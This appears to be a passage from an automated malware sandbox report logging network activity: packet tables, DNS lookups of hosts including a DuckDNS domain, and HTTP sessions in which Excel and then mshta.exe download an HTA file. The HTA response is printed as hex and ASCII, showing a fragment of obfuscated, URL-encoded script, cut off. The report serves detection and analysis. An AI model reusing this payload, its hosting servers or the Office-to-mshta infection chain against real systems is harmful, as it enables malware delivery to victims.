                                                                                                                                                                                Nov 25, 2024 14:08:13.838151932 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:08:33.909614086 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:08:34.482654095 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:08:35.184638977 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:08:36.385839939 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:08:38.881858110 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:08:43.686677933 CET4917680192.168.2.22178.237.33.50
                                                                                                                                                                                Nov 25, 2024 14:08:43.727855921 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:08:43.827982903 CET491742412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:08:43.949630976 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:08:53.280736923 CET4917680192.168.2.22178.237.33.50

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 25, 2024 14:06:33.524346113 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:33.883543968 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.780061007 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:38.026479006 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:38.027277946 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:38.271667957 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:38.272007942 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:38.406779051 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.204330921 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.335442066 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.335678101 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.338407040 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.470453978 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.470797062 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.589550972 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.600728035 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.606048107 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.608722925 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.731718063 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.733727932 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:06:58.859390020 CET53548218.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.868220091 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:14.829662085 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:07:15.200695038 CET53547198.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:15.203579903 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:07:15.338063955 CET53498818.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:22.723668098 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:07:23.063751936 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:26.006196022 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:07:26.251352072 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:26.252542019 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                Nov 25, 2024 14:07:26.497073889 CET53527818.8.8.8192.168.2.22

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Nov 25, 2024 14:06:33.524346113 CET192.168.2.228.8.8.80x252dStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:37.780061007 CET192.168.2.228.8.8.80xac53Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:38.027277946 CET192.168.2.228.8.8.80xac53Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:38.272007942 CET192.168.2.228.8.8.80xac53Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.204330921 CET192.168.2.228.8.8.80xa50cStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.335678101 CET192.168.2.228.8.8.80xa50cStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.338407040 CET192.168.2.228.8.8.80x9e0aStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.470797062 CET192.168.2.228.8.8.80xa50cStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.600728035 CET192.168.2.228.8.8.80xfbf7Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.608722925 CET192.168.2.228.8.8.80xa50cStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.733727932 CET192.168.2.228.8.8.80xa50cStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:14.829662085 CET192.168.2.228.8.8.80x116cStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:15.203579903 CET192.168.2.228.8.8.80x9da1Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:22.723668098 CET192.168.2.228.8.8.80xc6c2Standard query (0)newbeggin.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:26.006196022 CET192.168.2.228.8.8.80xe8b9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:26.252542019 CET192.168.2.228.8.8.80xe8b9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Nov 25, 2024 14:06:33.883543968 CET8.8.8.8192.168.2.220x252dNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:38.026479006 CET8.8.8.8192.168.2.220xac53No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:38.271667957 CET8.8.8.8192.168.2.220xac53No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:38.406779051 CET8.8.8.8192.168.2.220xac53No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.335442066 CET8.8.8.8192.168.2.220xa50cNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.470453978 CET8.8.8.8192.168.2.220xa50cNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.589550972 CET8.8.8.8192.168.2.220x9e0aNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.589550972 CET8.8.8.8192.168.2.220x9e0aNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.606048107 CET8.8.8.8192.168.2.220xa50cNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.731718063 CET8.8.8.8192.168.2.220xa50cNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.859390020 CET8.8.8.8192.168.2.220xfbf7No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.859390020 CET8.8.8.8192.168.2.220xfbf7No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:06:58.868220091 CET8.8.8.8192.168.2.220xa50cNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:15.200695038 CET8.8.8.8192.168.2.220x116cNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:15.200695038 CET8.8.8.8192.168.2.220x116cNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:15.338063955 CET8.8.8.8192.168.2.220x9da1No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:15.338063955 CET8.8.8.8192.168.2.220x9da1No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:23.063751936 CET8.8.8.8192.168.2.220xc6c2No error (0)newbeggin.duckdns.org31.13.224.72A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:26.251352072 CET8.8.8.8192.168.2.220xe8b9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 25, 2024 14:07:26.497073889 CET8.8.8.8192.168.2.220xe8b9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • provit.uk
                                                                                                                                                                                • 3105.filemail.com
                                                                                                                                                                                • 172.234.205.135
                                                                                                                                                                                • geoplugin.net

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.2249162172.234.205.135803356C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:06:36.130765915 CET381OUTGET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Host: 172.234.205.135
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 25, 2024 14:06:37.319276094 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:37 GMT
                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 11:44:20 GMT
                                                                                                                                                                                ETag: "1e074-627bb40d70f1b"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 122996
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/hta
                                                                                                                                                                                Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 53 63 72 69 70 74 25 32 30 4c 61 6e 67 75 61 67 65 25 33 44 25 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 37 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 32 30 48 54 4d 4c 25 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 30 70 72 6f 76 69 64 65 64 25 32 30 62 79 25 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 30 2d 2d 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 37 25 32 35 33 43 25 32 35 32 31 25 32 35 34 34 25 32 35 34 46 25 32 35 34 33 25 32 35 35 34 25 32 35 35 39 25 32 35 35 30 25 32 35 34 35 25 32 35 32 30 25 32 35 36 38 25 32 35 37 34 25 32 35 36 44 25 32 35 36 43 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 36 44 25 32 35 36 35 25 32 35 37 34 25 32 35 36 31 25 32 35 32 30 25 32 35 36 38 25 32 35 37 34 25 32 35 37 34 25 32 35 37 30 25 32 35 32 44 25 32 35 36 35 25 32 35 37 31 25 32 35 37 35 25 32 35 [TRUNCATED]
                                                                                                                                                                                Data Ascii: <script language=JavaScript>m='%3CScript%20Language%3D%27Javascript%27%3E%0A%3C%21--%20HTML%20Encryption%20provided%20by%20tufat.com%20--%3E%0A%3C%21--%0Adocument.write%28unescape%28%27%253C%2521%2544%254F%2543%2554%2559%2550%2545%2520%2568%2574%256D%256C%253E%250A%253C%256D%2565%2574%2561%2520%2568%2574%2574%2570%252D%2565%2571%2575%2569%2576%253D%2522%2558%252D%2555%2541%252D%2543%256F%256D%2570%2561%2574%2569%2562%256C%2565%2522%2520%2563%256F%256E%2574%2565%256E%2574%253D%2522%2549%2545%253D%2545%256D%2575%256C%2561%2574%2565%2549%2545%2538%2522%2520%253E%250A%253C%2568%2574%256D%256C%253E%250A%253C%2562%256F%2564%2579%253E%250A%253C%2553%2563%2552%2549%2570%2554%2520%2554%2579%2570%2565%253D%2522%2554%2565%2578%2554%252F%2576%2542%2553%2563%2552%2569%2550%2574%2522%253E%250A%2564%2569%254D%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%
                                                                                                                                                                                Nov 25, 2024 14:06:37.319375038 CET224INData Raw: 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35
                                                                                                                                                                                Data Ascii: 2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520
                                                                                                                                                                                Nov 25, 2024 14:06:37.319389105 CET1236INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32
                                                                                                                                                                                Data Ascii: %2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%25
                                                                                                                                                                                Nov 25, 2024 14:06:37.319423914 CET1236INData Raw: 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35
                                                                                                                                                                                Data Ascii: 2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2546%2558%2554%254B%2568%2561%2558%2562%254E%2543%2541%2566%2541%254A%256D%254B%254
                                                                                                                                                                                Nov 25, 2024 14:06:37.319442987 CET1236INData Raw: 35 35 33 25 32 35 34 41 25 32 35 34 37 25 32 35 34 42 25 32 35 36 44 25 32 35 35 33 25 32 35 37 31 25 32 35 36 45 25 32 35 35 33 25 32 35 34 32 25 32 35 36 33 25 32 35 36 32 25 32 35 35 36 25 32 35 34 35 25 32 35 34 33 25 32 35 35 36 25 32 35 34
                                                                                                                                                                                Data Ascii: 553%254A%2547%254B%256D%2553%2571%256E%2553%2542%2563%2562%2556%2545%2543%2556%2542%256B%257A%2552%254C%2556%254C%2572%254B%2549%2547%2576%2573%2575%254C%2543%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520
                                                                                                                                                                                Nov 25, 2024 14:06:37.319565058 CET1236INData Raw: 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                                                                                                                                                                Data Ascii: 20%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%
                                                                                                                                                                                Nov 25, 2024 14:06:37.319580078 CET1236INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                                                                                                                                                                Data Ascii: 0%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2
                                                                                                                                                                                Nov 25, 2024 14:06:37.319595098 CET1236INData Raw: 25 32 35 36 41 25 32 35 35 39 25 32 35 36 41 25 32 35 37 30 25 32 35 37 35 25 32 35 34 41 25 32 35 36 42 25 32 35 36 33 25 32 35 35 39 25 32 35 34 37 25 32 35 34 32 25 32 35 34 41 25 32 35 37 36 25 32 35 34 38 25 32 35 35 32 25 32 35 36 36 25 32
                                                                                                                                                                                Data Ascii: %256A%2559%256A%2570%2575%254A%256B%2563%2559%2547%2542%254A%2576%2548%2552%2566%257A%254A%256A%2552%256A%2565%254C%256E%2558%2552%257A%2567%2567%2571%2577%2572%2544%2567%2553%2555%254D%256C%2552%256F%2552%2575%256A%2554%256D%254F%257A%2550%25
                                                                                                                                                                                Nov 25, 2024 14:06:37.319612026 CET1236INData Raw: 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35
                                                                                                                                                                                Data Ascii: 2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%252
                                                                                                                                                                                Nov 25, 2024 14:06:37.319628000 CET1236INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                                                                                                                                                                Data Ascii: 520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520
                                                                                                                                                                                Nov 25, 2024 14:06:37.439981937 CET1236INData Raw: 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                                                                                                                                                                Data Ascii: 20%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.2249164172.234.205.135803652C:\Windows\System32\mshta.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:06:40.603158951 CET458OUTGET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Range: bytes=8896-
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Host: 172.234.205.135
                                                                                                                                                                                If-Range: "1e074-627bb40d70f1b"
                                                                                                                                                                                Nov 25, 2024 14:06:41.846602917 CET1236INHTTP/1.1 206 Partial Content
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:41 GMT
                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 11:44:20 GMT
                                                                                                                                                                                ETag: "1e074-627bb40d70f1b"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 114100
                                                                                                                                                                                Content-Range: bytes 8896-122995/122996
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/hta
                                                                                                                                                                                Data Raw: 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 [TRUNCATED]
                                                                                                                                                                                Data Ascii: 2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%25
                                                                                                                                                                                Nov 25, 2024 14:06:41.846631050 CET1236INData Raw: 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                                                                                                                                                                Data Ascii: 20%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%
                                                                                                                                                                                Nov 25, 2024 14:06:41.846645117 CET1236INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                                                                                                                                                                Data Ascii: 0%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2
                                                                                                                                                                                Nov 25, 2024 14:06:41.846657038 CET672INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32
                                                                                                                                                                                Data Ascii: %2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%25
                                                                                                                                                                                Nov 25, 2024 14:06:41.846669912 CET1236INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                                                                                                                                                                Data Ascii: 520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520
